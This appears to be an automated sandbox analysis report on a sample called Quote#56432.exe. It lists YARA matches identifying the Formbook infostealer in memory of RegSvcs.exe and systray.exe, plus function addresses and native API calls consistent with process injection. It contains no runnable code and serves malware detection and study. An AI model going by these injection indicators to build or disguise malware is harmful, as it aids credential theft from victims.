          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: Quote#56432.exe, Cheeeeeeeeese/MainForm.csLong String: Length: 38272
          Source: ySWmXEgh.exe.0.dr, Cheeeeeeeeese/MainForm.csLong String: Length: 38272
          Source: 0.0.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.csLong String: Length: 38272
          Source: 0.2.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.csLong String: Length: 38272
          Source: Quote#56432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_00687380
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_00684E85
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_0295CC14
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_0295F218
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_0295F208
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7D808
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B75D68
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B70F10
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7AF08
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B70040
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B73668
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7A7A8
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7B880
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7B870
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B72938
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B72948
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B71BE0
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B72C60
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B72C53
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B71DB8
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B71DAB
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B75D58
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7BEB0
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7BEA0
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B7AEF7
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B70E20
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B74E20
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_08B74E78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041E032
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041D121
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041DA37
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041DB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041D3E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041E62C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00409E3C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041D681
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01940D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A11D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01966E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04641002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459B090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04651D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0458F900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_04580D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A4120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0459D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045B2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045A6E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045BEBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037E032
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037D121
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00362D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00369E3C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00369E40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00362FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0194B150 appears 35 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0458B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419D60 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E10 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E90 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419D5A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419DBA NtCreateFile,NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00419E8A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019899D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019898A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019895F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989FE0 NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019896D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01989670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379E10 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379E90 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379D5A NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379DBA NtCreateFile,NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_00379E8A NtClose,
          Source: Quote#56432.exeBinary or memory string: OriginalFilename vs Quote#56432.exe
